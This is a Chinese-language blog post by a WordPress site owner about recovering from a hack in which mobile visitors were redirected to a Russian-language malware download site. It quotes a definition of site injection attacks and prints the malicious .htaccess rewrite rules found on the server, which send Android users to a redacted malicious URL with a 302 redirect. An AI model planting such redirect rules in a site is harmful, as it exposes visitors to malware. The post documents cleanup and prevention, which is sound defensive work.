博客被挂马

博客从前天出现电脑端访问是一片空白，需要输入一个密码，联系主机客服，说是插件导致，后来查看后台发现一个不明文件存在插件文件夹中，然后删除了其中好几个个插件，网站恢复了电脑端的访问，但是我用手机访问却被跳转到另外一个网站上，危险的网站，是俄语的界面，再点击一下，出来一个下载文件，我...

博客从前天出现电脑端访问是一片空白，需要输入一个密码，联系主机客服，说是插件导致，后来查看后台发现一个不明文件存在插件文件夹中，然后删除了其中好几个个插件，网站恢复了电脑端的访问，但是我用手机访问却被跳转到另外一个网站上，危险的网站，是俄语的界面，再点击一下，出来一个下载文件，我用手机下载了测试，360手机卫士果然警报说这是危险的应用。不知道是哪个天杀的黑客，黑了我的网站，给我挂一个病毒。

我联系主机客服，他们告知说这是网站被黑了，要自己处理。

但是网上搜索“wordpress网站被黑”等相关词句出来一些并没有多大相关性的文章，后来弄明白了一般这种情况被称为“挂马”，也就是。

百度百科关于挂马的解释如下：

所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库“备份/恢复”或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒。

下一步搜索到一篇文章“WordPress站点被挂马？如何预防、检测和应对？”发布于wp大学网站的。我用手机访问后恶意跳转的问题应当是重定向问题，这篇文章中就讲到.htaccess有可能被利用。结果的检查发现，果然是这货里面，出现了反常代码，至少我能看懂里面的一个url，这个url就是跳转过去的网站链接里面的。

这段恶意代码如下：

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} “Android” [NC]
RewriteRule ^(.*)$ http://恶意网址/ [L,R=302]
RewriteOptions inherit

那我就直接给删除一试，重新上传.htaccess，再用手机访问，这就正常了。

我估计这次被挂马，可能是插件安装的问题，插件安装不宜过多。最好是通过官方后台并且经过试试与现有版本兼容的插件。